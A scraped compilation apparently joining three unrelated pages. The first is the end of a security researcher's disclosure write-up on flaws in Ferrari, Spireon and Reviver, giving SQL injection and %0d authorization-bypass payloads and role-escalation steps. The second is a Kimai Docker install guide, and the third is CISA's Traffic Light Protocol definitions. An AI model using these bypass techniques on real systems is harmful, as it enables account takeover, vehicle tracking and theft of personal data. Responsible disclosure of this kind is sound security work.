})).url.startsWith(x.a.apiUrl) && !["/back-office/dealers", "/back-office/dealer-settings", "/back-office/locales", "/back-office/currencies", "/back-office/dealer-groups"].some(t => !!e.url.match(t)) && (e = (e = e.clone({
                                    headers: e.headers.set("Authorization", "" + (s || void 0))
                                })).clone({
                                    headers: e.headers.set("x-api-key", "" + a)
                                }));

All the elements needed for this discovery were conveniently tucked away in this JavaScript file. We knew what backend API to talk to and its routes, as well as the API key we needed to authenticate to the API.

Within the JavaScript, we noticed an API call to `/cms/dws/back-office/auth/bo-users`. When requesting this API through Burp Suite, it leaked all of the users registered for the Ferrari Dealers application. Furthermore, it was possible to send a POST request to this endpoint to add ourselves as a super admin user.

While impactful, we were still looking for a vulnerability that affected the broader Ferrari ecosystem and every end user. Spending more time deconstructing the JavaScript, we found some API calls were being made to `rest-connectors`:

return t.prototype.getConnectors = function() {
    return this.httpClient.get("rest-connectors")
}, t.prototype.getConnectorById = function(t) {
    return this.httpClient.get("rest-connectors/" + t)
}, t.prototype.createConnector = function(t) {
    return this.httpClient.post("rest-connectors", t)
}, t.prototype.updateConnector = function(t, e) {
    return this.httpClient.put("rest-connectors/" + t, e)
}, t.prototype.deleteConnector = function(t) {
    return this.httpClient.delete("rest-connectors/" + t)
}, t.prototype.getItems = function() {
    return this.httpClient.get("rest-connector-models")
}, t.prototype.getItemById = function(t) {
    return this.httpClient.get("rest-connector-models/" + t)
}, t.prototype.createItem = function(t) {
    return this.httpClient.post("rest-connector-models", t)
}, t.prototype.updateItem = function(t, e) {
    return this.httpClient.put("rest-connector-models/" + t, e)
}, t.prototype.deleteItem = function(t) {
    return this.httpClient.delete("rest-connector-models/" + t)
}, t

The following request unlocked the final piece in the puzzle. Sending the following request revealed a treasure trove of API credentials for Ferrari: :

GET /cms/dws/back-office/rest-connector-models HTTP/1.1

To explain what this endpoint’s purpose was: Ferrari had configured a number of backend APIs that could be communicated with by hitting specific paths. When hitting this API endpoint, it returned this list of API endpoints, hosts and authorization headers (in plain text). 

This information disclosure allowed us to query Ferrari’s production API to access the personal information of any Ferrari customer. In addition to being able to view these API endpoints, we could also register new rest connectors or modify existing ones. 

HTTP Request

GET /core/api/v1/Users?email=ian@ian.sh HTTP/1.1
Host: fcd.services.ferrari.com

HTTP Response

HTTP/1.1 200 OK
Content-type: application/json

…"guid":"2d32922a-28c4-483e-8486-7c2222b7b59c","email":"ian@ian.sh","nickName":"ian@ian.sh","firstName":"Ian","lastName":"Carroll","birthdate":"1963-12-11T00:00:00"…

The API key and production endpoints that were disclosed using the previous staging API key allowed an attacker to access, create, modify, and delete any production user account. It additionally allowed an attacker to query users via email address or nickname.

Additionally, an attacker could POST to the “/core/api/v1/Users/:id/Roles” endpoint to edit their user roles, setting themselves to have super-user permissions or become a Ferrari owner.

This vulnerability would allow an attacker to access, modify, and delete any Ferrari customer account with access to manage their vehicle profile.

(4) SQL Injection and Regex Authorization Bypass on Spireon Systems allows Attacker to Access, Track, and Send Arbitrary Commands to 15 million Telematics systems and Additionally Fully Takeover Fleet Management Systems for Police Departments, Ambulance Services, Truckers, and Many Business Fleet Systems

When identifying car-related targets to hack on, we found the company Spireon. In the early 90s and 2000s, there were a few companies like OnStar, Goldstar, and FleetLocate which were standalone devices which were put into vehicles to track and manage them. The devices have the capabilities to be tracked and receive arbitrary commands, e.g. locking the starter so the vehicle cannot start.

Sometime in the past, Spireon had acquired many GPS Vehicle Tracking and Management Companies and put them under the Spireon parent company. 

We read through the Spireon marketing and saw that they claimed to have over 15 million connected vehicles. They offered services directly to customers and additionally many services through their subsidiary companies like OnStar.

We decided to research them as, if an attacker were able to compromise the administration functionality for these devices and fleets, they would be able to perform actions against over 15 million vehicles with very interesting functionalities like sending a cities police officers a dispatch location, disabling vehicle starters, and accessing financial loan information for dealers.

Our first target for this was very obvious: admin.spireon.com

The website appeared to be a very out of date global administration portal for Spireon employees to authenticate and perform some sort of action. We attempted to identify interesting endpoints which were accessible without authorization, but kept getting redirected back to the login.

Since the website was so old, we tried the trusted manual SQL injection payloads but were kicked out by a WAF that was installed on the system

We switched to a much simpler payload: sending an apostrophe, seeing if we got an error, then sending two apostrophes and seeing if we did not get an error. This worked! The system appeared to be reacting to sending an odd versus even number of apostrophes. This indicated that our input in both the username and password field was being passed to a system which could likely be vulnerable to some sort of SQL injection attack.

For the username field, we came up with a very simple payload:

victim' #

The above payload was designed to simply cut off the password check from the SQL query. We sent this HTTP request to Burp Suite’s intruder with a common username list and observed that we received various 301 redirects to “/dashboard” for the username “administrator” and “admin”.

After manually sending the HTTP request using the admin username, we observed that we were authenticated into the Spireon administrator portal as an administrator user. At this point, we browsed around the application and saw many interesting endpoints.

The functionality was designed to manage Spireon devices remotely. The administrator user had access to all Spireon devices, including those of OnStar, GoldStar, and FleetLocate. We could query these devices and retrieve the live location of whatever the devices were installed on, and additionally send arbitrary commands to these devices. There was additional functionality to overwrite the device configuration including what servers it reached out to download updated firmware.

Using this portal, an attacker could create a malicious Spireon package, update the vehicle configuration to call out to the modified package, then download and install the modified Spireon software.

At this point, an attacker could backdoor the Spireon device and run arbitrary commands against the device. 

Since these devices were very ubiquitous and were installed on things like tractors, golf carts, police cars, and ambulances, the impact of each device differed. For some, we could only access the live GPS location of the device, but for others we could disable the starter and send police and ambulance dispatch locations.

We reported the vulnerability immediately, but during testing, we observed an HTTP 500 error which disclosed the API URL of the backend API endpoint that the “admin.spireon.com” service reached out to. Initially, we dismissed this as we assumed it was internal, but after circling back we observed that we could hit the endpoint and it would trigger an HTTP 403 forbidden error.

Our goal now was seeing if we could find some sort of authorization bypass on the host and what endpoints were accessible. By bypassing the administrator UI, we could directly reach out to each device and have direct queries for vehicles and user accounts via the backend API calls.

We fuzzed the host and eventually observed some weird behavior:

By sending any string with “admin” or “dashboard”, the system would trigger an HTTP 403 forbidden response, but would return 404 if we didn’t include this string. As an example, if we attempted to load “/anything-admin-anything” we’d receive 403 forbidden, while if we attempted to load “/anything-anything” it would return a 404.

We took the blacklisted strings, put them in a list, then attempted to enumerate the specific endpoints with fuzzing characters (%00 to %FF) stuck behind the first and last characters.

During scanning, we saw that the following HTTP requests would return a 200 OK response:

GET /%0dadmin
GET /%0ddashboard

Through Burp Suite, we sent the HTTP response to our browser and observed the response: it was a full administrative portal for the core Spireon app. We quickly set up a match and replace rule to modify GET /admin and GET /dashboard to the endpoints with the %0d prefix.

After setting up this rule, we could browse to “/admin” or “/dashboard” and explore the website without having to perform any additional steps. We observed that there were dozens of endpoints which were used to query all connected vehicles, send arbitrary commands to connected vehicles, and view all customer tenant accounts, fleet accounts, and customer accounts. We had access to everything.

At this point, a malicious actor could backdoor the 15 million devices, query what ownership information was associated with a specific VIN, retrieve the full user information for all customer accounts, and invite themselves to manage any fleet which was connected to the app.

For our proof of concept, we invited ourselves to a random fleet account and saw that we received an invitation to administrate a US Police Department where we could track the entire police fleet.

(5) Mass Assignment on Reviver allows an Attacker to Remotely Track and Overwrite the Virtual License Plates for All Reviver Customers, Track and Administrate Reviver Fleets, and Access, Modify, and Delete All User Information

In October, 2022, California announced that it had legalized digital license plates. We researched this for a while and found that most, if not all of the digital license plates, were done through a company called Reviver.

If someone wanted a digital license plate, they’d buy the virtual Reviver license plate which included a SIM card for remotely tracking and updating the license plate. Customers who uses Reviver could remotely update their license plates slogan, background, and additionally report if the car had been stolen via setting the plate tag to “STOLEN”.

Since the license plate could be used to track vehicles, we were super interested in Reviver and began auditing the mobile app. We proxied the HTTP traffic and saw that all API functionality was done on the “pr-api.rplate.com” website. After creating a user account, our user account was assigned to a unique “company” JSON object which allowed us to add other sub-users to our account.

The company JSON object was super interesting as we could update many of the JSON fields within the object. One of these fields was called “type” and was default set to “CONSUMER”. After noticing this, we dug through the app source code in hopes that we could find another value to set it to, but were unsuccessful.

At this point, we took a step back and wondered if there was an actual website we could talk to versus proxying traffic through the mobile app. We looked online for a while before getting the idea to perform a reset password on our account which gave us a URL to navigate to.

Once we opened the password reset URL, we observed that the website had tons of functionality including the ability to administer vehicles, fleets, and user accounts. This was super interesting as we now had a lot more API endpoints and functionality to access. Additionally, the JavaScript on the website appeared to have the names of the other roles that our user account could be (e.g. specialized names for user, moderator, admin, etc.)

We queried the “CONSUMER” string in the JavaScript and saw that there were other roles that were defined in the JavaScript. After attempting to update our “role” parameter to the disclosed “CORPORATE” role, we refreshed out profile metadata, then saw that it was successful! We were able to change our roles to ones other than the default user account, opening the door to potential privilige escalation vulnerabilities.

It appeared that, even though we had updated our account to the “CORPORATE” role, we were still receiving authorization vulnerabilities when logging into the website. We thought for a while until realizing that we could invite users to our modified account which had the elevated role, which may then grant the invited users the required permissions since they were invited via an intended way versus mass assigning an account to an elevated role.

After inviting a new account, accepting the invitation, and logging into the account, we observed that we no longer received authorization errors and could access fleet management functionality. This meant that we could likely (1) mass assign our account to an even higher elevated role (e.g. admin), then (2) invite a user to our account which would be assigned the appropriate permissions.

This perplexed us as there was likely some administration group which existed in the system but that we had not yet identified. We brute forced the “type” parameter using wordlists until we noticed that setting our group to the number “4” had updated our role to “REVIVER_ROLE”. It appeared that the roles were indexed to numbers, and we could simply run through the numbers 0-100 and find all the roles on the website.

The “0” role was the string “REVIVER”, and after setting this on our account and re-inviting a new user, we logged into the website normally and observed that the UI was completely broken and we couldn’t click any buttons. From what we could guess, we had the administrator role but were accessing the account using the customer facing frontend website and not the appropriate administrator frontend website. We would have to find the endpoints used by administrators ourselves.

Since our administrator account theoretically had elevated permissions, our first test was simply querying a user account and seeing if we could access someone else’s data: this worked!

We could take any of the normal API calls (viewing vehicle location, updating vehicle plates, adding new users to accounts) and perform the action using our super administrator account with full authorization.

At this point, we reported the vulnerability and observed that it was patched in under 24 hours. An actual attacker could remotely update, track, or delete anyone’s REVIVER plate. We could additionally access any dealer (e.g. Mercedes-Benz dealerships will often package REVIVER plates) and update the default image used by the dealer when the newly purchased vehicle still had DEALER tags.

The Reviver website also offered fleet management functionality which we had full access to.

(6) Full Remote Vehicle Access and Full Account Takeover affecting Hyundai and Genesis

This vulnerability was written up on Twitter and can be accessed on the following thread:

https://platform.twitter.com/embed/Tweet.html?dnt=true&embedId=twitter-widget-0&features=eyJ0ZndfdGltZWxpbmVfbGlzdCI6eyJidWNrZXQiOlsibGlua3RyLmVlIiwidHIuZWUiLCJ0ZXJyYS5jb20uYnIiLCJ3d3cubGlua3RyLmVlIiwid3d3LnRyLmVlIiwid3d3LnRlcnJhLmNvbS5iciJdLCJ2ZXJzaW9uIjpudWxsfSwidGZ3X2hvcml6b25fdGltZWxpbmVfMTIwMzQiOnsiYnVja2V0IjoidHJlYXRtZW50IiwidmVyc2lvbiI6bnVsbH0sInRmd190d2VldF9lZGl0X2JhY2tlbmQiOnsiYnVja2V0Ijoib24iLCJ2ZXJzaW9uIjpudWxsfSwidGZ3X3JlZnNyY19zZXNzaW9uIjp7ImJ1Y2tldCI6Im9uIiwidmVyc2lvbiI6bnVsbH0sInRmd19zaG93X2J1c2luZXNzX3ZlcmlmaWVkX2JhZGdlIjp7ImJ1Y2tldCI6Im9uIiwidmVyc2lvbiI6bnVsbH0sInRmd19jaGluX3BpbGxzXzE0NzQxIjp7ImJ1Y2tldCI6ImNvbG9yX2ljb25zIiwidmVyc2lvbiI6bnVsbH0sInRmd190d2VldF9yZXN1bHRfbWlncmF0aW9uXzEzOTc5Ijp7ImJ1Y2tldCI6InR3ZWV0X3Jlc3VsdCIsInZlcnNpb24iOm51bGx9LCJ0ZndfbWl4ZWRfbWVkaWFfMTU4OTciOnsiYnVja2V0IjoidHJlYXRtZW50IiwidmVyc2lvbiI6bnVsbH0sInRmd19zZW5zaXRpdmVfbWVkaWFfaW50ZXJzdGl0aWFsXzEzOTYzIjp7ImJ1Y2tldCI6ImludGVyc3RpdGlhbCIsInZlcnNpb24iOm51bGx9LCJ0ZndfZXhwZXJpbWVudHNfY29va2llX2V4cGlyYXRpb24iOnsiYnVja2V0IjoxMjA5NjAwLCJ2ZXJzaW9uIjpudWxsfSwidGZ3X2R1cGxpY2F0ZV9zY3JpYmVzX3RvX3NldHRpbmdzIjp7ImJ1Y2tldCI6Im9uIiwidmVyc2lvbiI6bnVsbH0sInRmd192aWRlb19obHNfZHluYW1pY19tYW5pZmVzdHNfMTUwODIiOnsiYnVja2V0IjoidHJ1ZV9iaXRyYXRlIiwidmVyc2lvbiI6bnVsbH0sInRmd19zaG93X2JsdWVfdmVyaWZpZWRfYmFkZ2UiOnsiYnVja2V0Ijoib24iLCJ2ZXJzaW9uIjpudWxsfSwidGZ3X2xlZ2FjeV90aW1lbGluZV9zdW5zZXQiOnsiYnVja2V0IjpmYWxzZSwidmVyc2lvbiI6bnVsbH0sInRmd19zaG93X2dvdl92ZXJpZmllZF9iYWRnZSI6eyJidWNrZXQiOiJvbiIsInZlcnNpb24iOm51bGx9LCJ0Zndfc2hvd19idXNpbmVzc19hZmZpbGlhdGVfYmFkZ2UiOnsiYnVja2V0Ijoib24iLCJ2ZXJzaW9uIjpudWxsfSwidGZ3X3R3ZWV0X2VkaXRfZnJvbnRlbmQiOnsiYnVja2V0Ijoib24iLCJ2ZXJzaW9uIjpudWxsfX0%3D&frame=false&hideCard=false&hideThread=false&id=1597695281881296897&lang=en&origin=https%3A%2F%2Fsamcurry.net%2Fweb-hackers-vs-the-auto-industry%2F&sessionId=53b9ca9842ac4a0ce6fd39e82f4b1bd614f85d70&theme=light&widgetsVersion=a3525f077c700%3A1667415560940&width=550px

(7) Full Remote Vehicle Access and Full Account Takeover affecting Honda, Nissan, Infiniti, Acura

This vulnerability was written up on Twitter and can be accessed on the following thread:

https://platform.twitter.com/embed/Tweet.html?dnt=true&embedId=twitter-widget-1&features=eyJ0ZndfdGltZWxpbmVfbGlzdCI6eyJidWNrZXQiOlsibGlua3RyLmVlIiwidHIuZWUiLCJ0ZXJyYS5jb20uYnIiLCJ3d3cubGlua3RyLmVlIiwid3d3LnRyLmVlIiwid3d3LnRlcnJhLmNvbS5iciJdLCJ2ZXJzaW9uIjpudWxsfSwidGZ3X2hvcml6b25fdGltZWxpbmVfMTIwMzQiOnsiYnVja2V0IjoidHJlYXRtZW50IiwidmVyc2lvbiI6bnVsbH0sInRmd190d2VldF9lZGl0X2JhY2tlbmQiOnsiYnVja2V0Ijoib24iLCJ2ZXJzaW9uIjpudWxsfSwidGZ3X3JlZnNyY19zZXNzaW9uIjp7ImJ1Y2tldCI6Im9uIiwidmVyc2lvbiI6bnVsbH0sInRmd19zaG93X2J1c2luZXNzX3ZlcmlmaWVkX2JhZGdlIjp7ImJ1Y2tldCI6Im9uIiwidmVyc2lvbiI6bnVsbH0sInRmd19jaGluX3BpbGxzXzE0NzQxIjp7ImJ1Y2tldCI6ImNvbG9yX2ljb25zIiwidmVyc2lvbiI6bnVsbH0sInRmd190d2VldF9yZXN1bHRfbWlncmF0aW9uXzEzOTc5Ijp7ImJ1Y2tldCI6InR3ZWV0X3Jlc3VsdCIsInZlcnNpb24iOm51bGx9LCJ0ZndfbWl4ZWRfbWVkaWFfMTU4OTciOnsiYnVja2V0IjoidHJlYXRtZW50IiwidmVyc2lvbiI6bnVsbH0sInRmd19zZW5zaXRpdmVfbWVkaWFfaW50ZXJzdGl0aWFsXzEzOTYzIjp7ImJ1Y2tldCI6ImludGVyc3RpdGlhbCIsInZlcnNpb24iOm51bGx9LCJ0ZndfZXhwZXJpbWVudHNfY29va2llX2V4cGlyYXRpb24iOnsiYnVja2V0IjoxMjA5NjAwLCJ2ZXJzaW9uIjpudWxsfSwidGZ3X2R1cGxpY2F0ZV9zY3JpYmVzX3RvX3NldHRpbmdzIjp7ImJ1Y2tldCI6Im9uIiwidmVyc2lvbiI6bnVsbH0sInRmd192aWRlb19obHNfZHluYW1pY19tYW5pZmVzdHNfMTUwODIiOnsiYnVja2V0IjoidHJ1ZV9iaXRyYXRlIiwidmVyc2lvbiI6bnVsbH0sInRmd19zaG93X2JsdWVfdmVyaWZpZWRfYmFkZ2UiOnsiYnVja2V0Ijoib24iLCJ2ZXJzaW9uIjpudWxsfSwidGZ3X2xlZ2FjeV90aW1lbGluZV9zdW5zZXQiOnsiYnVja2V0IjpmYWxzZSwidmVyc2lvbiI6bnVsbH0sInRmd19zaG93X2dvdl92ZXJpZmllZF9iYWRnZSI6eyJidWNrZXQiOiJvbiIsInZlcnNpb24iOm51bGx9LCJ0Zndfc2hvd19idXNpbmVzc19hZmZpbGlhdGVfYmFkZ2UiOnsiYnVja2V0Ijoib24iLCJ2ZXJzaW9uIjpudWxsfSwidGZ3X3R3ZWV0X2VkaXRfZnJvbnRlbmQiOnsiYnVja2V0Ijoib24iLCJ2ZXJzaW9uIjpudWxsfX0%3D&frame=false&hideCard=false&hideThread=false&id=1597792097175674880&lang=en&origin=https%3A%2F%2Fsamcurry.net%2Fweb-hackers-vs-the-auto-industry%2F&sessionId=53b9ca9842ac4a0ce6fd39e82f4b1bd614f85d70&theme=light&widgetsVersion=a3525f077c700%3A1667415560940&width=550px

(8) Full Vehicle Takeover on Nissan via Mass Assignment

This vulnerability was written up on Twitter and can be accessed on the following thread:

https://platform.twitter.com/embed/Tweet.html?dnt=true&embedId=twitter-widget-2&features=eyJ0ZndfdGltZWxpbmVfbGlzdCI6eyJidWNrZXQiOlsibGlua3RyLmVlIiwidHIuZWUiLCJ0ZXJyYS5jb20uYnIiLCJ3d3cubGlua3RyLmVlIiwid3d3LnRyLmVlIiwid3d3LnRlcnJhLmNvbS5iciJdLCJ2ZXJzaW9uIjpudWxsfSwidGZ3X2hvcml6b25fdGltZWxpbmVfMTIwMzQiOnsiYnVja2V0IjoidHJlYXRtZW50IiwidmVyc2lvbiI6bnVsbH0sInRmd190d2VldF9lZGl0X2JhY2tlbmQiOnsiYnVja2V0Ijoib24iLCJ2ZXJzaW9uIjpudWxsfSwidGZ3X3JlZnNyY19zZXNzaW9uIjp7ImJ1Y2tldCI6Im9uIiwidmVyc2lvbiI6bnVsbH0sInRmd19zaG93X2J1c2luZXNzX3ZlcmlmaWVkX2JhZGdlIjp7ImJ1Y2tldCI6Im9uIiwidmVyc2lvbiI6bnVsbH0sInRmd19jaGluX3BpbGxzXzE0NzQxIjp7ImJ1Y2tldCI6ImNvbG9yX2ljb25zIiwidmVyc2lvbiI6bnVsbH0sInRmd190d2VldF9yZXN1bHRfbWlncmF0aW9uXzEzOTc5Ijp7ImJ1Y2tldCI6InR3ZWV0X3Jlc3VsdCIsInZlcnNpb24iOm51bGx9LCJ0ZndfbWl4ZWRfbWVkaWFfMTU4OTciOnsiYnVja2V0IjoidHJlYXRtZW50IiwidmVyc2lvbiI6bnVsbH0sInRmd19zZW5zaXRpdmVfbWVkaWFfaW50ZXJzdGl0aWFsXzEzOTYzIjp7ImJ1Y2tldCI6ImludGVyc3RpdGlhbCIsInZlcnNpb24iOm51bGx9LCJ0ZndfZXhwZXJpbWVudHNfY29va2llX2V4cGlyYXRpb24iOnsiYnVja2V0IjoxMjA5NjAwLCJ2ZXJzaW9uIjpudWxsfSwidGZ3X2R1cGxpY2F0ZV9zY3JpYmVzX3RvX3NldHRpbmdzIjp7ImJ1Y2tldCI6Im9uIiwidmVyc2lvbiI6bnVsbH0sInRmd192aWRlb19obHNfZHluYW1pY19tYW5pZmVzdHNfMTUwODIiOnsiYnVja2V0IjoidHJ1ZV9iaXRyYXRlIiwidmVyc2lvbiI6bnVsbH0sInRmd19zaG93X2JsdWVfdmVyaWZpZWRfYmFkZ2UiOnsiYnVja2V0Ijoib24iLCJ2ZXJzaW9uIjpudWxsfSwidGZ3X2xlZ2FjeV90aW1lbGluZV9zdW5zZXQiOnsiYnVja2V0IjpmYWxzZSwidmVyc2lvbiI6bnVsbH0sInRmd19zaG93X2dvdl92ZXJpZmllZF9iYWRnZSI6eyJidWNrZXQiOiJvbiIsInZlcnNpb24iOm51bGx9LCJ0Zndfc2hvd19idXNpbmVzc19hZmZpbGlhdGVfYmFkZ2UiOnsiYnVja2V0Ijoib24iLCJ2ZXJzaW9uIjpudWxsfSwidGZ3X3R3ZWV0X2VkaXRfZnJvbnRlbmQiOnsiYnVja2V0Ijoib24iLCJ2ZXJzaW9uIjpudWxsfX0%3D&frame=false&hideCard=false&hideThread=false&id=1597984481511903234&lang=en&origin=https%3A%2F%2Fsamcurry.net%2Fweb-hackers-vs-the-auto-industry%2F&sessionId=53b9ca9842ac4a0ce6fd39e82f4b1bd614f85d70&theme=light&widgetsVersion=a3525f077c700%3A1667415560940&width=550px

Credits

The following people contributed towards this project:

Special thanks to the following people who helped create this blog post:

Source :
https://samcurry.net/web-hackers-vs-the-auto-industry/

How To Install Kimai Time Tracking App in Docker

In this guide, I’ll show you how to deploy the open source time tracking app Kimai in a Docker container. Kimai is free, browser-based (so it’ll work on mobile devices), and is extremely flexible for just about every use case.

It has a stopwatch feature where you can start/stop/pause a worklog timer. Then, it accumulates the total into daily, weekly, monthly or yearly reports, which can be exported or printed as invoices.

It supports single or multi users, so you can even track time for your entire department. All statistics are visible on a beautiful dashboard, which makes historical time-tracking a breeze.


Why use Kimai Time Tracker?

For my scenario, I am salaried at work. However, since I’m an IT Manager, I often find myself working after hours or on weekends to patch servers, reboot systems, or perform system and infrastructure upgrades. Normally, I use a pen and paper or a notetaking app to track overtime, although this is pretty inefficent. Sometimes I forget when I started or stopped, or if I’ve written down the time on a notepade at home, I can’t view that time at work.

And when it comes to managing a team of others who also perform after hours maintenance, it becomes even harder to track their total overtime hours.

Over the past few weeks, I stumbled across Kimai and really love all the features. Especially when I can spin it up in a docker or docker compose container!

If you don’t have Docker installed, follow this guide: https://smarthomepursuits.com/how-to-install-docker-ubuntu/

If you don’t have Docker-Compose installed, follow this guide: https://smarthomepursuits.com/how-to-install-portainer-with-docker-in-ubuntu-20-04/

In this tutorial, we will be installing Kimai for 1 user using standard Docker run commands. Other users can be added from the webui after initial setup.


Step 1: SSH into your Docker Host

Open Putty and SSH into your server that is running docker and docker compose.


Step 2: Create Kimai Database container

Enter the command below to create a new database to use with Kimai. You can copy and paste into Putty by right-clicking after copy, or CTRL+SHIFT+V into other ssh clients.

sudo docker run --rm --name kimai-mysql \
    -e MYSQL_DATABASE=kimai \
    -e MYSQL_USER=kimai \
    -e MYSQL_PASSWORD=kimai \
    -e MYSQL_ROOT_PASSWORD=kimai \
    -p 3399:3306 -d mysql

Step 3: Start Kimai

Next, start the Kimai container using the already created database. If you look at the Kimai github page, you’ll notice that this isn’t the same command as what shows there.

Here’s the original command (which I’m not using):

docker run --rm --name kimai-test -ti -p 8001:8001 -e DATABASE_URL=mysql://kimai:kimai@${HOSTNAME}:3399/kimai kimai/kimai2:apache

And here’s my command. I had to explicitly add TRUSTED_HOSTS, the ADMINMAIL and ADMINPASS, and change the ${HOSTNAME} to the IP address of your docker host. Otherwise, I wasn’t able to access Kimai from other computers on my local network.

  • Green = change port here if already in use
  • Red = Add the IP address of your docker host
  • Orange = Manually specifying the admin email and password. This is what you’ll use to log in with.
  • Blue = Change to docker host IP address
sudo docker run --rm --name kimai -ti -p 8001:8001 -e TRUSTED_HOSTS=192.168.68.141,localhost,127.0.0.1 -e ADMINMAIL=example@gmail.com -e ADMINPASS=8charpassword -e DATABASE_URL=mysql://kimai:kimai@192.168.68.141:3399/kimai kimai/kimai2:apache

Note that 8 characters is the minimum for the password.


Step 4: Log In via Web Browser

Next, Kimai should now be running!

To check, you can go to your http://dockerIP:8001 in a web browser (192.168.68.141:8001)

Then simply log in with the credentials you created.


Step 5: Basic Setup

This app is extremely powerful and customizeable, so I won’t be going over all the available options since everyone has different needs.

Like I mentioned earlier, I’m using Kimai for overtime tracking only, so the first step for me is to create a new “customer”.

Create a Customer

This is sort of unintuitive, but you need to create a customer before you can start tracking time to a project. I’m creating a generic “Employee” customer.

Click Customers on the left sidebar, then click the + button in the top right corner.

Create A Project

Click Projects on the left sidebar:

Then click the + button in the top right corner.

Add a name, choose the customer you just created, and then choose a date range.

Create An Activity

Click Activity on the left, then create an activity. I’m calling mine Overtime Worked and assigning it to the Project “Overtime 2021” I just created.


Step 6: Change “Timetracking Mode” to Time-clock

Click Settings. Under Timetracking mode, change it to Time-Clock. This will let you click the Play button to start/stop time worked vs having to manually enter start and stop times.


Step 7: Start Tracking Time!

To start tracking time, simply click the timer widget in the top right corner.

A screen will pop up asking you what project and activity you want to apply the time to.

The selfhosted stopwatch will start tracking time right after. You can then view the timesheets for yourself under the My Times section or for all users under the Timesheets or Reporting tabs.


Wrapping Up

Hopefully this guide helped you get Kimai installed and setup! If you have any questions, feel free to let me know in the comments below and I’ll do my best to help you out.


My Homelab Equipment

Here is some of the gear I use in my Homelab. I highly recommend each of them.

The full list of server components I use can be found on my Equipment List page.

Source :
https://smarthomepursuits.com/how-to-install-kimai-time-tracking-app-in-docker/

Traffic Light Protocol (TLP) Definitions and Usage

CISA currently uses Traffic Light Protocol (TLP) according to the FIRST Standard Definitions and Usage Guidance — TLP Version 2.0Note: On Nov. 1, 2022, CISA officially adopted TLP 2.0; however, CISA’s Automated Indicator Sharing (AIS) capability will not update from TLP 1.0 to TLP 2.0 until March 2023. This exception includes AIS’s use of the following open standards: the Structured Threat Information Expression (STIX™) for cyber threat indicators and defensive measures information and the Trusted Automated Exchange of Intelligence Information (TAXII™) for machine-to-machine communications.

In addition to the FIRST TLP 2.0 webpage, see CISA’s:

Collapse All Sections

What is TLP?

The Traffic Light Protocol (TLP) was created in order to facilitate greater sharing of information. TLP is a set of designations used to ensure that sensitive information is shared with the appropriate audience. It employs five official marking options to indicate expected sharing boundaries to be applied by the recipient(s). TLP only has five marking options; any designations not listed in this standard are not considered valid by FIRST.

TLP provides a simple and intuitive schema for indicating when and how sensitive information can be shared, facilitating more frequent and effective collaboration. TLP is not a “control marking” or classification scheme. TLP was not designed to handle licensing terms, handling and encryption rules, and restrictions on action or instrumentation of information. TLP labels and their definitions are not intended to have any effect on freedom of information or “sunshine” laws in any jurisdiction.

TLP is optimized for ease of adoption, human readability and person-to-person sharing; it may be used in automated sharing exchanges, but is not optimized for that use.

TLP is distinct from the Chatham House Rule (when a meeting, or part thereof, is held under the Chatham House Rule, participants are free to use the information received, but neither the identity nor the affiliation of the speaker(s), nor that of any other participant, may be revealed.), but may be used in conjunction if it is deemed appropriate by participants in an information exchange.

The source is responsible for ensuring that recipients of TLP information understand and can follow TLP sharing guidance.

If a recipient needs to share the information more widely than indicated by the original TLP designation, they must obtain explicit permission from the original source.

How do I determine appropriate TLP designation?

ColorWhen should it be used?How may it be shared?
 TLP:RED 
TLP:RED
Not for disclosure, restricted to participants only.
Sources may use TLP:RED when information cannot be effectively acted upon without significant risk for the privacy, reputation, or operations of the organizations involved. For the eyes and ears of individual recipients only, no further.Recipients may not share TLP:RED information with any parties outside of the specific exchange, meeting, or conversation in which it was originally disclosed. In the context of a meeting, for example, TLP:RED information is limited to those present at the meeting. In most circumstances, TLP:RED should be exchanged verbally or in person.
 TLP:AMBER+STRICT 
TLP:AMBER
Limited disclosure, restricted to participants’ organization.
Sources may use TLP:AMBER+STRICT when information requires support to be effectively acted upon, yet carries risk to privacy, reputation, or operations if shared outside of the organization.Recipients may share TLP:AMBER+STRICT information only with members of their own organization on a need-to-know basis to protect their organization and prevent further harm.
 TLP:AMBER 
TLP:AMBER
Limited disclosure, restricted to participants’ organization and its clients (see Terminology Definitions).
Sources may use TLP:AMBER when information requires support to be effectively acted upon, yet carries risk to privacy, reputation, or operations if shared outside of the organizations involved. Note that TLP:AMBER+STRICT should be used to restrict sharing to the recipient organization only. Recipients may share TLP:AMBER information with members of their own organization and its clients on a need-to-know basis to protect their organization and its clients and prevent further harm.
 TLP:GREEN 
TLP:GREEN
Limited disclosure, restricted to the community.
Sources may use TLP:GREEN when information is useful to increase awareness within their wider community.Recipients may share TLP:GREEN information with peers and partner organizations within their community, but not via publicly accessible channels. Unless otherwise specified, TLP:GREEN information may not be shared outside of the cybersecurity or cyber defense community.
 TLP:CLEAR 
TLP:WHITE
Disclosure is not limited.
Sources may use TLP:CLEAR when information carries minimal or no foreseeable risk of misuse, in accordance with applicable rules and procedures for public release.Recipients may share this information without restriction. Information is subject to standard copyright rules.

TLP 2.0 Terminology Definitions

Community

Under TLP, a community is a group who share common goals, practices, and informal trust relationships. A community can be as broad as all cybersecurity practitioners in a country (or in a sector or region).

Organization

Under TLP, an organization is a group who share a common affiliation by formal membership and are bound by common policies set by the organization. An organization can be as broad as all members of an information sharing organization, but rarely broader.

Clients

Under TLP, clients are those people or entities that receive cybersecurity services from an organization. Clients are by default included in TLP:AMBER so that the recipients may share information further downstream in order for clients to take action to protect themselves. For teams with national responsibility, this definition
includes stakeholders and constituents. Note: CISA considers “clients” to be stakeholders and constituents that have a legal agreement with CISA.

Usage

How to use TLP in email

TLP-designated email correspondence should indicate the TLP color of the information in the Subject line and in the body of the email, prior to the designated information itself. The TLP color must be in capital letters: TLP:RED, TLP:AMBER+STRICT, TLP:AMBER, TLP:GREEN, or TLP:WHITE.

How to use TLP in documents

TLP-designated documents should indicate the TLP color of the information in the header and footer of each page. To avoid confusion with existing control marking schemes, it is advisable to right-justify TLP designations. The TLP color should appear in capital letters and in 12 point type or greater. Note: TLP 2.0 has changed the color coding of TLP:RED to accomodate individuals with low vision.

RGB:
TLP:RED : R=255, G=43, B=43, background: R=0, G=0, B=0
TLP:AMBER : R=255, G=192, B=0, background: R=0, G=0, B=0
TLP:GREEN : R=51, G=255, B=0, background: R=0, G=0, B=0
TLP:WHITE : R=255, G=255, B=255, background: R=0, G=0, B=0

CMYK:
TLP:RED : C=0, M=83, Y=83, K=0, background: C=0, M=0, Y=0, K=100
TLP:AMBER : C=0, M=25, Y=100, K=0, background: C=0, M=0, Y=0, K=100
